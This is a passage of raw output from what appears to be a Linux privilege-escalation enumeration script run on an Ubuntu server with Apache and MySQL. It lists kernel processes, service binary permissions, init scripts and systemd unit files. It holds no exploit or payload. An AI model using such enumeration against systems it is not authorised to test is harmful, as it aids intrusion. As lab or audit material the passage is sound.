0.0 0 0 ? S 17:24 0:00 [scsi_eh_23] root 250 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_23] root 251 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_24] root 252 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_24] root 253 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_25] root 254 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_25] root 255 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_26] root 256 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_26] root 257 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_27] root 258 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_27] root 259 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_28] root 260 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_28] root 261 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_29] root 262 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_29] root 263 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_30] root 264 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_30] root 265 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_31] root 266 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_31] root 290 0.0 0.0 0 0 ? I 17:24 0:00 [kworker/u128:27] root 294 0.0 0.0 0 0 ? S 17:24 0:00 [scsi_eh_32] root 295 0.0 0.0 0 0 ? I< 17:24 0:00 [scsi_tmf_32] root 297 0.0 0.0 0 0 ? I< 17:24 0:00 [ttm_swap] root 298 0.0 0.0 0 0 ? S 17:24 0:00 [irq/16-vmwgfx] root 300 0.0 0.0 0 0 ? I< 17:24 0:00 [kworker/0:1H] root 370 0.0 0.0 0 0 ? I< 17:24 0:00 [raid5wq] root 394 0.0 0.0 0 0 ? I< 17:24 0:00 [kdmflush] root 395 0.0 0.0 0 0 ? I< 17:24 0:00 [bioset] root 429 0.0 0.0 0 0 ? S 17:24 0:00 [jbd2/dm-0-8] root 430 0.0 0.0 0 0 ? I< 17:24 0:00 [ext4-rsv-conver] root 494 0.0 0.2 78464 8104 ? S dash
-rwxr-xr-x 1 root root 129096 Jul 22 16:45 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root 219272 Jul 22 16:45 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 1625168 Jul 22 16:45 /lib/systemd/systemd-networkd
-rwxr-xr-x 1 root root 378944 Jul 22 16:45 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root 38976 Jul 22 16:45 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root 584136 Jul 22 16:45 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root 56552 Oct 15 2018 /sbin/agetty
lrwxrwxrwx 1 root root 20 Jul 22 16:45 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 84104 Jun 4 09:59 /sbin/lvmetad
-rwxr-xr-x 1 root root 125144 May 14 07:07 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root 236584 Jun 10 18:05 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 18504 Nov 23 2018 /usr/bin/lxcfs
lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6
-rwxr-xr-x 1 root root 51456 May 14 07:07 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 182552 Dec 18 2017 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root 14552 Mar 27 13:57 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root 17572456 Jun 5 06:41 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root 671392 Aug 26 13:41 /usr/sbin/apache2
-rwxr-xr-x 1 root root 26632 Feb 20 2018 /usr/sbin/atd
-rwxr-xr-x 1 root root 47416 Nov 16 2017 /usr/sbin/cron
-rwxr-xr-x 1 root root 25019144 Jul 22 18:02 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 680488 Apr 24 2018 /usr/sbin/rsyslogd

[-] /etc/init.d/ binary permissions:
total 188
drwxr-xr-x 2 root root 4096 Aug 31 17:25 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rwxr-xr-x 1 root root 2269 Apr 22 2017 acpid
-rwxr-xr-x 1 root root 2489 Jul 16 18:14 apache-htcacheclean
-rwxr-xr-x 1 root root 8181 Jul 16 18:14 apache2
-rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor
-rwxr-xr-x 1 root root 2802 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1071 Aug 21 2015 atd
-rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh
-rwxr-xr-x 1 root root 3049 Nov 16 2017 cron
-rwxr-xr-x 1 root root 937 Mar 18 2018 cryptdisks
-rwxr-xr-x 1 root root 978 Mar 18 2018 cryptdisks-early
-rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus
-rwxr-xr-x 1 root root 4489 Jun 28 2018 ebtables
-rwxr-xr-x 1 root root 985 Mar 18 16:11 grub-common
-rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh
-rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance
-rwxr-xr-x 1 root root 1503 Dec 12 2018 iscsid
-rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod
-rwxr-xr-x 1 root root 695 Dec 3 2017 lvm2
-rwxr-xr-x 1 root root 571 Dec 3 2017 lvm2-lvmetad
-rwxr-xr-x 1 root root 586 Dec 3 2017 lvm2-lvmpolld
-rwxr-xr-x 1 root root 2378 Nov 23 2018 lxcfs
-rwxr-xr-x 1 root root 2240 Nov 23 2018 lxd
-rwxr-xr-x 1 root root 2653 Jan 30 2019 mdadm
-rwxr-xr-x 1 root root 1249 Jan 30 2019 mdadm-waitidle
-rwxr-xr-x 1 root root 5607 Jan 12 2018 mysql
-rwxr-xr-x 1 root root 2503 Dec 12 2018 open-iscsi
-rwxr-xr-x 1 root root 1846 Apr 5 13:47 open-vm-tools
-rwxr-xr-x 1 root root 1366 Apr 4 14:33 plymouth
-rwxr-xr-x 1 root root 752 Apr 4 14:33 plymouth-log
-rwxr-xr-x 1 root root 1191 Jan 17 2018 procps
-rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync
-rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog
-rwxr-xr-x 1 root root 1222 May 21 2017 screen-cleanup
-rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh
-rwxr-xr-x 1 root root 5974 Apr 20 2018 udev
-rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw
-rwxr-xr-x 1 root root 1391 Apr 29 10:13 unattended-upgrades
-rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd

[-] /etc/init/ config file permissions:
total 12
drwxr-xr-x 2 root root 4096 Aug 20 06:22 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r–r– 1 root root 1757 Jan 12 2018 mysql.conf

[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root 36K Aug 31 17:25 system
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 network
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 system-generators
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 system-preset
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-sleep
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-shutdown
-rw-r–r– 1 root root 2.3M Jul 22 16:45 libsystemd-shared-237.so
-rw-r–r– 1 root root 699 Jul 22 16:45 resolv.conf
-rwxr-xr-x 1 root root 1.3K Jul 22 16:45 set-cpufreq
-rwxr-xr-x 1 root root 1.6M Jul 22 16:45 systemd
-rwxr-xr-x 1 root root 6.0K Jul 22 16:45 systemd-ac-power
-rwxr-xr-x 1 root root 18K Jul 22 16:45 systemd-backlight
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-binfmt
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-cgroups-agent
-rwxr-xr-x 1 root root 22K Jul 22 16:45 systemd-cryptsetup
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-dissect
-rwxr-xr-x 1 root root 18K Jul 22 16:45 systemd-fsck
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-fsckd
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-growfs
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-hibernate-resume
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-hostnamed
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-initctl
-rwxr-xr-x 1 root root 127K Jul 22 16:45 systemd-journald
-rwxr-xr-x 1 root root 35K Jul 22 16:45 systemd-localed
-rwxr-xr-x 1 root root 215K Jul 22 16:45 systemd-logind
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-makefs
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-modules-load
-rwxr-xr-x 1 root root 1.6M Jul 22 16:45 systemd-networkd
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-quotacheck
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-random-seed
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-remount-fs
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-reply-password
-rwxr-xr-x 1 root root 371K Jul 22 16:45 systemd-resolved
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-rfkill
-rwxr-xr-x 1 root root 43K Jul 22 16:45 systemd-shutdown
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-sleep
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-socket-proxyd
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-sulogin-shell
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-sysctl
-rwxr-xr-x 1 root root 1.3K Jul 22 16:45 systemd-sysv-install
-rwxr-xr-x 1 root root 27K Jul 22 16:45 systemd-timedated
-rwxr-xr-x 1 root root 39K Jul 22 16:45 systemd-timesyncd
-rwxr-xr-x 1 root root 571K Jul 22 16:45 systemd-udevd
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-update-utmp
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-user-sessions
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-veritysetup
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-volatile-root

/lib/systemd/system:
total 1.1M
drwxr-xr-x 2 root root 4.0K Aug 31 17:25 apache2.service.d
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 user@.service.d
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 rc-local.service.d
lrwxrwxrwx 1 root root 9 Aug 5 19:24 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 reboot.target.wants
lrwxrwxrwx 1 root root 14 Jul 22 16:45 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkroot.service -> /dev/null
-rw-r–r– 1 root root 1.1K Jul 22 16:45 console-getty.service
-rw-r–r– 1 root root 1.3K Jul 22 16:45 container-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Jul 22 16:45 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Jul 22 16:45 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Jul 22 16:45 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Jul 22 16:45 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 Jul 22 16:45 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 debug-shell.service
lrwxrwxrwx 1 root root 16 Jul 22 16:45 default.target -> graphical.target
-rw-r–r– 1 root root 797 Jul 22 16:45 emergency.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 fuse.service -> /dev/null
-rw-r–r– 1 root root 342 Jul 22 16:45 getty-static.service
-rw-r–r– 1 root root 2.0K Jul 22 16:45 getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 hwclock.service -> /dev/null
-rw-r–r– 1 root root 670 Jul 22 16:45 initrd-cleanup.service
-rw-r–r– 1 root root 830 Jul 22 16:45 initrd-parse-etc.service
-rw-r–r– 1 root root 589 Jul 22 16:45 initrd-switch-root.service
-rw-r–r– 1 root root 704 Jul 22 16:45 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 killprocs.service -> /dev/null
-rw-r–r– 1 root root 717 Jul 22 16:45 kmod-static-nodes.service
lrwxrwxrwx 1 root root 28 Jul 22 16:45 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 28 Jul 22 16:45 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountnfs.service -> /dev/null
-rw-r–r– 1 root root 362 Jul 22 16:45 ondemand.service
lrwxrwxrwx 1 root root 22 Jul 22 16:45 procps.service -> systemd-sysctl.service
-rw-r–r– 1 root root 609 Jul 22 16:45 quotaon.service
-rw-r–r– 1 root root 716 Jul 22 16:45 rc-local.service
lrwxrwxrwx 1 root root 16 Jul 22 16:45 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 reboot.service -> /dev/null
-rw-r–r– 1 root root 788 Jul 22 16:45 rescue.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Jul 22 16:45 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Jul 22 16:45 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Jul 22 16:45 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Jul 22 16:45 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 Jul 22 16:45 sendsigs.service -> /dev/null
-rw-r–r– 1 root root 1.5K Jul 22 16:45 serial-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 stop-bootlogd.service -> /dev/null
-rw-r–r– 1 root root 554 Jul 22 16:45 suspend-then-hibernate.target
-rw-r–r– 1 root root 1.4K Jul 22 16:45 system-update-cleanup.service
-rw-r–r– 1 root root 724 Jul 22 16:45 systemd-ask-password-console.service
-rw-r–r– 1 root root 752 Jul 22 16:45 systemd-ask-password-wall.service
-rw-r–r– 1 root root 752 Jul 22 16:45 systemd-backlight@.service
-rw-r–r– 1 root root 999 Jul 22 16:45 systemd-binfmt.service
-rw-r–r– 1 root root 537 Jul 22 16:45 systemd-exit.service
-rw-r–r– 1 root root 714 Jul 22 16:45 systemd-fsck-root.service
-rw-r–r– 1 root root 715 Jul 22 16:45 systemd-fsck@.service
-rw-r–r– 1 root root 551 Jul 22 16:45 systemd-fsckd.service
-rw-r–r– 1 root root 540 Jul 22 16:45 systemd-fsckd.socket
-rw-r–r– 1 root root 584 Jul 22 16:45 systemd-halt.service
-rw-r–r– 1 root root 671 Jul 22 16:45 systemd-hibernate-resume@.service
-rw-r–r– 1 root root 541 Jul 22 16:45 systemd-hibernate.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-hostnamed.service
-rw-r–r– 1 root root 818 Jul 22 16:45 systemd-hwdb-update.service
-rw-r–r– 1 root root 559 Jul 22 16:45 systemd-hybrid-sleep.service
-rw-r–r– 1 root root 551 Jul 22 16:45 systemd-initctl.service
-rw-r–r– 1 root root 771 Jul 22 16:45 systemd-journal-flush.service
-rw-r–r– 1 root root 686 Jul 22 16:45 systemd-journald-audit.socket
-rw-r–r– 1 root root 1.6K Jul 22 16:45 systemd-journald.service
-rw-r–r– 1 root root 597 Jul 22 16:45 systemd-kexec.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-localed.service
-rw-r–r– 1 root root 1.5K Jul 22 16:45 systemd-logind.service
-rw-r–r– 1 root root 733 Jul 22 16:45 systemd-machine-id-commit.service
-rw-r–r– 1 root root 1007 Jul 22 16:45 systemd-modules-load.service
-rw-r–r– 1 root root 740 Jul 22 16:45 systemd-networkd-wait-online.service
-rw-r–r– 1 root root 1.9K Jul 22 16:45 systemd-networkd.service
-rw-r–r– 1 root root 593 Jul 22 16:45 systemd-poweroff.service
-rw-r–r– 1 root root 655 Jul 22 16:45 systemd-quotacheck.service
-rw-r–r– 1 root root 792 Jul 22 16:45 systemd-random-seed.service
-rw-r–r– 1 root root 588 Jul 22 16:45 systemd-reboot.service
-rw-r–r– 1 root root 833 Jul 22 16:45 systemd-remount-fs.service
-rw-r–r– 1 root root 1.7K Jul 22 16:45 systemd-resolved.service
-rw-r–r– 1 root root 724 Jul 22 16:45 systemd-rfkill.service
-rw-r–r– 1 root root 573 Jul 22 16:45 systemd-suspend-then-hibernate.service
-rw-r–r– 1 root root 537 Jul 22 16:45 systemd-suspend.service
-rw-r–r– 1 root root 693 Jul 22 16:45 systemd-sysctl.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-timedated.service
-rw-r–r– 1 root root 1.4K Jul 22 16:45 systemd-timesyncd.service
-rw-r–r– 1 root root 659 Jul 22 16:45 systemd-tmpfiles-clean.service
-rw-r–r– 1 root root 764 Jul 22 16:45 systemd-tmpfiles-setup-dev.service
-rw-r–r– 1 root root 744 Jul 22 16:45 systemd-tmpfiles-setup.service
-rw-r–r– 1 root root 863 Jul 22 16:45 systemd-udev-settle.service
-rw-r–r– 1 root root 755 Jul 22 16:45 systemd-udev-trigger.service
-rw-r–r– 1 root root 985 Jul 22 16:45 systemd-udevd.service
-rw-r–r– 1 root root 797 Jul 22 16:45 systemd-update-utmp-runlevel.service
-rw-r–r– 1 root root 794 Jul 22 16:45 systemd-update-utmp.service
-rw-r–r– 1 root root 628 Jul 22 16:45 systemd-user-sessions.service
-rw-r–r– 1 root root 690 Jul 22 16:45 systemd-volatile-root.service
lrwxrwxrwx 1 root root 21 Jul 22 16:45 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Jul 22 16:45 urandom.service -> systemd-random-seed.service
-rw-r–r– 1 root root 593 Jul 22 16:45 user@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 x11-common.service -> /dev/null
-rw-r–r– 1 root root 528 Jul 16 18:14 apache-htcacheclean.service
-rw-r–r– 1 root root 537 Jul 16 18:14 apache-htcacheclean@.service
-rw-r–r– 1 root root 346 Jul 16 18:14 apache2.service
-rw-r–r– 1 root root 418 Jul 16 18:14 apache2@.service
-rw-r–r– 1 root root 161 Jul 8 18:43 motd-news.timer
-rw-r–r– 1 root root 505 Jun 10 18:05 dbus.service
-rw-r–r– 1 root root 106 Jun 10 18:05 dbus.socket
-rw-r–r– 1 root root 340 Jun 5 06:41 snapd.autoimport.service
-rw-r–r– 1 root root 320 Jun 5 06:41 snapd.core-fixup.service
-rw-r–r– 1 root root 172 Jun 5 06:41 snapd.failure.service
-rw-r–r– 1 root root 322 Jun 5 06:41 snapd.seeded.service
-rw-r–r– 1 root root 477 Jun 5 06:41 snapd.service
-rw-r–r– 1 root root 372 Jun 5 06:41 snapd.snap-repair.service
-rw-r–r– 1 root root 281 Jun 5 06:41 snapd.snap-repair.timer
-rw-r–r– 1 root root 281 Jun 5 06:41 snapd.socket
-rw-r–r– 1 root root 521 Jun 5 06:41 snapd.system-shutdown.service
-rw-r–r– 1 root root 383 Jun 4 09:59 blk-availability.service
-rw-r–r– 1 root root 341 Jun 4 09:59 dm-event.service
-rw-r–r– 1 root root 248 Jun 4 09:59 dm-event.socket
-rw-r–r– 1 root root 345 Jun 4 09:59 lvm2-lvmetad.service
-rw-r–r– 1 root root 215 Jun 4 09:59 lvm2-lvmetad.socket
-rw-r–r– 1 root root 300 Jun 4 09:59 lvm2-lvmpolld.service
-rw-r–r– 1 root root 213 Jun 4 09:59 lvm2-lvmpolld.socket
-rw-r–r– 1 root root 693 Jun 4 09:59 lvm2-monitor.service
-rw-r–r– 1 root root 403 Jun 4 09:59 lvm2-pvscan@.service
lrwxrwxrwx 1 root root 9 Jun 4 09:59 lvm2.service -> /dev/null
-rw-r–r– 1 root root 466 May 14 07:05 open-vm-tools.service
-rw-r–r– 1 root root 385 May 14 07:05 vgauth.service
-rw-r–r– 1 root root 418 May 11 05:17 cloud-config.service
-rw-r–r– 1 root root 482 May 11 05:17 cloud-final.service
-rw-r–r– 1 root root 580 May 11 05:17 cloud-init-local.service
-rw-r–r– 1 root root 642 May 11 05:17 cloud-init.service
-rw-r–r– 1 root root 536 May 10 18:38 cloud-config.target
-rw-r–r– 1 root root 256 May 10 18:38 cloud-init.target
-rw-r–r– 1 root root 289 May 9 17:11 netplan-wpa@.service
-rw-r–r– 1 root root 238 May 7 09:19 apt-daily-upgrade.service
-rw-r–r– 1 root root 184 May 7 09:19 apt-daily-upgrade.timer
-rw-r–r– 1 root root 326 May 7 09:19 apt-daily.service
-rw-r–r– 1 root root 156 May 7 09:19 apt-daily.timer
-rw-r–r– 1 root root 372 Apr 29 10:13 unattended-upgrades.service
-rw-r–r– 1 root root 312 Apr 23 12:04 console-setup.service
-rw-r–r– 1 root root 287 Apr 23 12:04 keyboard-setup.service
-rw-r–r– 1 root root 330 Apr 23 12:04 setvtrgb.service
-rw-r–r– 1 root root 481 Apr 10 14:14 mdadm-grow-continue@.service
-rw-r–r– 1 root root 210 Apr 10 14:14 mdadm-last-resort@.service
-rw-r–r– 1 root root 179 Apr 10 14:14 mdadm-last-resort@.timer
-rw-r–r– 1 root root 670 Apr 10 14:14 mdadm-shutdown.service
lrwxrwxrwx 1 root root 9 Apr 10 14:14 mdadm-waitidle.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 10 14:14 mdadm.service -> /dev/null
-rw-r–r– 1 root root 1.1K Apr 10 14:14 mdmon@.service
-rw-r–r– 1 root root 388 Apr 10 14:14 mdmonitor.service
-rw-r–r– 1 root root 250 Apr 9 21:01 ureadahead-stop.service
-rw-r–r– 1 root root 242 Apr 9 21:01 ureadahead-stop.timer
-rw-r–r– 1 root root 404 Apr 9 21:01 ureadahead.service
-rw-r–r– 1 root root 412 Apr 4 15:41 plymouth-halt.service
-rw-r–r– 1 root root 426 Apr 4 15:41 plymouth-kexec.service
lrwxrwxrwx 1 root root 27 Apr 4 15:41 plymouth-log.service -> plymouth-read-write.service
-rw-r–r– 1 root root 421 Apr 4 15:41 plymouth-poweroff.service
-rw-r–r– 1 root root 200 Apr 4 15:41 plymouth-quit-wait.service
-rw-r–r– 1 root root 194 Apr 4 15:41 plymouth-quit.service
-rw-r–r– 1 root root 244 Apr 4 15:41 plymouth-read-write.service
-rw-r–r– 1 root root 416 Apr 4 15:41 plymouth-reboot.service
-rw-r–r– 1 root root 532 Apr 4 15:41 plymouth-start.service
-rw-r–r– 1 root root 291 Apr 4 15:41 plymouth-switch-root.service
lrwxrwxrwx 1 root root 21 Apr 4 15:41 plymouth.service -> plymouth-quit.service
-rw-r–r– 1 root root 490 Apr 4 15:41 systemd-ask-password-plymouth.path
-rw-r–r– 1 root root 467 Apr 4 15:41 systemd-ask-password-plymouth.service
-rw-r–r– 1 root root 463 Mar 28 18:14 iscsid.service
-rw-r–r– 1 root root 242 Feb 6 2019 apport-autoreport.service
-rw-r–r– 1 root root 254 Jan 14 2019 thermald.service
-rw-r–r– 1 root root 368 Jan 9 2019 irqbalance.service
-rw-r–r– 1 root root 175 Dec 12 2018 iscsid.socket
-rw-r–r– 1 root root 987 Dec 12 2018 open-iscsi.service
-rw-r–r– 1 root root 605 Nov 23 2018 lxd.service
-rw-r–r– 1 root root 320 Nov 23 2018 lxd-containers.service
-rw-r–r– 1 root root 197 Nov 23 2018 lxd.socket
-rw-r–r– 1 root root 311 Nov 23 2018 lxcfs.service
-rw-r–r– 1 root root 92 Oct 15 2018 fstrim.service
-rw-r–r– 1 root root 170 Oct 15 2018 fstrim.timer
-rw-r–r– 1 root root 189 Oct 15 2018 uuidd.service
-rw-r–r– 1 root root 126 Oct 15 2018 uuidd.socket
-rw-r–r– 1 root root 618 Oct 15 2018 friendly-recovery.service
-rw-r–r– 1 root root 172 Oct 15 2018 friendly-recovery.target
-rw-r–r– 1 root root 258 Oct 15 2018 networkd-dispatcher.service
-rw-r–r– 1 root root 173 Aug 6 2018 motd-news.service
-rw-r–r– 1 root root 212 Jul 10 2018 apport-autoreport.path
-rw-r–r– 1 root root 456 Jun 28 2018 ebtables.service
-rw-r–r– 1 root root 309 May 30 2018 pollinate.service
-rw-r–r– 1 root root 290 Apr 24 2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants
-rw-r–r– 1 root root 175 Mar 27 2018 polkit.service
-rw-r–r– 1 root root 544 Mar 22 2018 apparmor.service
-rw-r–r– 1 root root 169 Feb 20 2018 atd.service
-rw-r–r– 1 root root 919 Jan 28 2018 basic.target
-rw-r–r– 1 root root 419 Jan 28 2018 bluetooth.target
-rw-r–r– 1 root root 465 Jan 28 2018 cryptsetup-pre.target
-rw-r–r– 1 root root 412 Jan 28 2018 cryptsetup.target
-rw-r–r– 1 root root 750 Jan 28 2018 dev-hugepages.mount
-rw-r–r– 1 root root 665 Jan 28 2018 dev-mqueue.mount
-rw-r–r– 1 root root 471 Jan 28 2018 emergency.target
-rw-r–r– 1 root root 541 Jan 28 2018 exit.target
-rw-r–r– 1 root root 480 Jan 28 2018 final.target
-rw-r–r– 1 root root 506 Jan 28 2018 getty-pre.target
-rw-r–r– 1 root root 500 Jan 28 2018 getty.target
-rw-r–r– 1 root root 598 Jan 28 2018 graphical.target
-rw-r–r– 1 root root 527 Jan 28 2018 halt.target
-rw-r–r– 1 root root 509 Jan 28 2018 hibernate.target
-rw-r–r– 1 root root 530 Jan 28 2018 hybrid-sleep.target
-rw-r–r– 1 root root 593 Jan 28 2018 initrd-fs.target
-rw-r–r– 1 root root 561 Jan 28 2018 initrd-root-device.target
-rw-r–r– 1 root root 566 Jan 28 2018 initrd-root-fs.target
